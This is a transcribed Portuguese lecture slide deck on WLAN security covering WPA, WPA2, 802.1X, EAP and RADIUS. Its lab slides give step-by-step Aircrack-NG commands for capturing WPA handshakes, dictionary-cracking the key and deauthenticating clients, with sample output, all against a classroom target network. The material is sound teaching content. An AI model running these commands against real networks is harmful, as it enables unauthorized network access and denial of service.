Redes sem Fio Segurança em WLANs (802.11) Parte 03. Ricardo Kléber. Ricardo Kléber

Transcrição

1 Redes sem Fio Segurança em WLANs (802.11) Parte 03 Curso Superior de Tecnologia em Sistemas para Internet Turma: TEC.SIS.5M

2 Protocolos de Segurança para Redes sem Fio

3 WPA (Wi-Fi Protected Access) Inicialmente (2003) conhecido como WEP2 Criado para substituir (e corrigir as fragilidades) do WEP Tamanho (mínimo-padrão) das chaves: 128 bits (máximo = 256 bits) Existem duas versões (uso doméstico ou "empresarial") Personal mode (PSK pre-shared key) Chave secreta (compartilhada) é usada pelos usuários para autenticação Não usa servidor de autenticação de usuários Enterprise mode Distribuição de uma chave para cada usuário (ideal) Uso de um servidor de autenticação de usuários

4 WPA (Wi-Fi Protected Access) O que mudou com relação ao WEP? Fim do uso da cifra de stream RC4 de 64 ou 128bits E do uso de vetores de inicialização pequenos e cíclicos Uso do protocolo TKIP (Temporal Key Integrity Protocol) Troca dinâmica (e contínua) de chaves entre o sistema e o usuário O WPA também alterou a checagem de integridade do payload Algoritmo Michael Message Integrity Check (MIC) O WEP utilizava somente o CRC (Cyclic Redundancy Check) Era possível alterar o payload e re-gerar o CRC!!! Ataques de repetição (replay)

5 WPA (Wi-Fi Protected Access) No processo de autenticação na rede, o cliente envia um handshake (espécie de token encriptado) que contém o hash da chave WPA. O ataque consiste em: Capturar o handshake durante o processo de autenticação de uma das estações da rede; Executar um ataque do dicionário / força-bruta contra o hash. A captura deve ser interrompida assim que um handshake for capturado O sucesso depende da força da senha (e de sorte na escolha do dicionário)

6 Captura e ataques a redes WPA (prática) Cenário (Laboratório de Redes) AP com rede WPA (Alvo_02) Utilizar estações do laboratório (Linux) + USB-WiFi Atenção!!! A captura (grampo) naturalmente só funcionará nos equipamentos com o Linux (nativo), adaptador Wi- Fi, driver com suporte ao modo monitor e software de captura (pacote Aircrack-NG) NÃO use seus equipamentos pessoais na rede de testes durante as práticas!!!

7 Captura e ataques a redes WPA (prática) Processo semelhante à prática de ataques WEP Utilize novamente o adaptador USB-WiFi # airmon-ng start wlan0 # iwconfig # airodump-ng mon0 Verifique se a interface mon0 foi ativada Ative a análise multi-canal e identifique os dados do Access Point e da Rede # airodump-ng -w captura -c canal --bssid MAC_DO_AP mon0 Com a captura em andamento, execute (em outro terminal) o aircrack-ng para tentar verificar se algum handshake já foi capturado. # aircrack-ng captura*.cap

8 Captura e ataques a redes WPA (prática) Exemplo de resposta (aircrack-ng) SEM captura de handshake # aircrack-ng captura*.cap Opening captura-01.cap Read 542 packets. # BSSID ESSID Encryption 1 00:AA:11:DD:EE:FF RedeTeste WPA (0 handshake) Exemplo de resposta (aircrack-ng) COM captura de handshake # aircrack-ng captura*.cap Opening captura-01.cap Read 630 packets. # BSSID ESSID Encryption 1 00:AA:11:DD:EE:FF RedeTeste WPA (1 handshake)

9 Captura e ataques a redes WPA (prática) Usando um dicionário para descobrir a chave (força-bruta) Crie (ou copie de alguma fonte específica) um arquivo EM MODO TEXTO PURO contendo uma sugestão de senha por linha. teste123 qwerty admin adminadmin... Utilize o parâmetro -w para informar o arquivo de senhas: Exemplo: # aircrack-ng captura*.cap -w arquivo_senhas.txt

10 Captura e ataques a redes WPA (prática) Exemplo de resposta sem sucesso (senha não estava na lista): # BSSID ESSID Encryption 1 00:AA:BB:CC:DD:EE Rede_Pirata WPA (1 handshake) Choosing first network as target. Opening wpa01.pcap Reading packets, please wait... Passphrase not in dictionary Exemplo de resposta com sucesso (chave descoberta): Aircrack-ng 1.2 beta3 [00:00:00] 8 keys tested ( k/s) KEY FOUND! [ CHAVE_SECRETA ] Master Key : EE A6 F6 8E FE 73 C8 0A 3A A6 F2 DD 0E A5 37 BC E6 27 B C C6 E (...)

11 Captura e ataques a redes WEP (prática) Atividade Prática Ativar a interface de rede WiFi em modo monitor Utilizando o Airmon-NG Capturar e analisar o tráfego de redes sem fio Utilizando o Airodump-NG Identificar e capturar "um handshake" tráfego (WPA) da rede Alvo_02 Tentar quebrar a chave WPA (usando o Aircrack-NG)

12 Captura e ataques a redes WPA Técnicas de Ataque Complementares O processo de captura só terá sucesso de o grampo conseguir capturar um pacote handshake (que só é enviado no momento em que uma estação se autentica na rede sem fio); Mesmo durante um processo legítimo de autenticação, e tendo a estação gerado e enviado um handshake, o grampo pode não conseguir capturar o pacote completamente (por descarte perda parcial no momento da captura); O ataque de desconexão forçada (desautenticação) de estações autenticadas é indicado nesses casos (esta técnica também faz uso do aplicativo aireplay-ng, porém utilizando um parâmetro específico).

13 Captura e ataques a redes WPA Ferramenta do pacote Aircrack-NG para desconexão forçada Uma das ferramentas que pode ser utilizada para este tipo de ataque complementar é o aireplay-ng (contida no pacote Aircrack-NG). Para desautenticação de estações autenticadas em um AP com WPA, o parâmetro do aireplay-ng é o 0. Sintaxe: Número de pacotes de desautenticação a enviar # aireplay-ng a MAC_do_AP -c MAC_Cliente <interface> Para identificar tanto o MAC do AP como o MAC do Cliente utilizar antes o airodump-ng e observar o BSSID (AP) e STATION (Cliente)

14 Qual a melhor solução, então? Autenticação obrigatória para acesso à rede Padrão já utilizado (2001) em switches com controle de portas Pontos de rede sem controle (físico) Corredores e/ou ambientes públicos p.ex. Port Based Network Access Control 802.1X

15 WPA2 Padrão i Métodos utilizados no modelo WPA Enterprise Queda de performance (robustez = uso de mais recursos) Uso do algoritmo AES (Advanced Encryption Standard) Algoritmo também conhecido como Rijndael Fusão dos nomes dos criadores: Vincent Rijmen e Joan Daemen 128 bits (mínimo) / 192 / 256 bits (máximo) Substituição do método de controle de integridade Michael -> CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol)

16 WPA2 Padrão i Autenticação mútua Estação (Supplicant) Access Point (Autenticador) Servidor de Autenticação (RADIUS) Implementação: Protocolo 802.1X (necessários nos 3 componentes)

17 RADIUS (Remote Authentication Dial-In User Service) Padrão pra autenticação popularizado nas rede Dial-UP Acionado a partir do RAS (Remote Access Server) dos provedores Utilizado (também) para a autenticação dos usuários em rede WLAN Retira do dispositivo de rede a responsabilidade de armazenar informações de verificação de senha O RADIUS não é uma solução somente de autenticação: É Uma solução de AAA = Autenticação, Autorização e Contabilização (Authentication, Authorization e Accounting).

18 RADIUS (Remote Authentication Dial-In User Service) Esquema de utilização nos provedores Dial-UP Rede Telefônica Servidor RADIUS (Autenticação) (Contabilização) Usuário MODEM Servidor de Acesso Remoto (RAS)

19 RADIUS (Remote Authentication Dial-In User Service) Os dispositivos de rede se comunicam com o RADIUS através do protocolo EAP (Extensible Authentication Protocol) O EAP suporta vários tipos de autenticação: Kerberos, Challenge- Response, TLS, etc. É comum a referência ao uso do EAP como EAPOL (EAP Over Lan)

20 802.1X + EAP + RADIUS em rede Wireless Access Point (Solicita Autenticação) Servidor de Autenticação (RADIUS) Estação Cliente (Supplicant) Rede (Interna ou Externa) Controlador de Domínio (AD) Base LDAP Sistema Linux (PAM/Passwd)!!!???

21 802.1X + EAP + RADIUS em rede Wireless

22 802.1X + EAP + RADIUS em rede Wireless Variações de utilização do protocolo EAP: EAP LEAP: Usuário (login) e senha Padrão na maioria dos equipamentos (Cisco p.ex.) EAP TLS (RFC2716): Uso de Certificados Digitais (X.509) EAP TTLS: Certificado + Login / Senha do usuário (supplicant) Outras implementações complementares: PEAP: Evolução do EAP (encapsulado) EAP FAST: Substituto do EAP LEAP EAP SIM / EAP AKA / MS-CHAPv2...

23 Ataques complementares Sistemas sem fio (também) são vulneráveis a Ataques Lógicos de negação de serviço (DoS) Ataques (contínuo) de desassociação de estação específica Ataques (contínuo) de desassociação de todas as estações Ataques Físicos de negação de serviço (DoS) Poluição espectral proposital (Jamming) Alteração do canal (paliativo em caso de ataque intencional) Sem a identificação da fonte o ataque não cessa Difícil detecção e contra-resposta